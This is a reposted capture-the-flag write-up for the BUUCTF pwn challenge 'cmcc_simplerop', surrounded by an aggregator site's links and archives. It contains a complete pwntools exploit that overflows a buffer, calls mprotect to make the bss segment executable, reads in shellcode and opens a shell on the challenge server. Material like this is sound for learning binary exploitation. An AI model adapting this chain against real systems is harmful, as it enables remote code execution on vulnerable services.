BUUCTF-PWN-cmcc_simplerop

Others 2020-09-18 14:19:29 views: null

BUUCTF-cmcc_simplerop

Opened NX

 

IDA decompilation

The program is very simple and the loopholes are also visible at a glance

There is no system in the program. There are many solutions to this problem. Here we use the mprotect method to modify the bss segment and execute the shellcode.

exploit:

#coding:utf-8
from pwn import *

#p=process('simplerop')
p=remote('node3.buuoj.cn',29617)
elf=ELF('simplerop')


#0x0809de85 : pop ebp ; pop esi ; pop edi ; ret
payload='a'*32+p32(elf.symbols['mprotect'])+p32(0x0809de85)+p32(0x080EB000)+p32(0x1000)+p32(0x7)+p32(elf.symbols['read'])+p32(0x0809de85)+p32(0)+p32(0x080EBF80)+p32(0x100)+p32(0x080EBF80)
p.sendlineafter('nput :',payload)
sleep(0.2)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

Execution effect

 

 

 

 

 

 

 

 

 

Guess you like

Origin blog.csdn.net/qq_41743240/article/details/105808642
Recommended
Ranking
Solve the problem that the Chinese display of the drawing using python matplotlib under the Linux system is displayed as a box
[Conference Call for Papers] The 5th International Conference on Civil Engineering, Environmental Resources and Energy Materials (CCESEM 2023)
4-yl Fast Fourier Transform
DataGirdView interlaced display color
[Docker implements test deployment CI/CD----Dingding alarm after the build is successful (7)]
[Asp.net core series] 6 the complete structure of a project in actual combat
The new version of OpenCenterV3 management background
Why can box plots detect outliers and what is the principle?
[Switch] jumbo frame Introduction
C++对象移动(3)——移动构造函数
Daily
More
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)

Code World

© 2018 codetd.com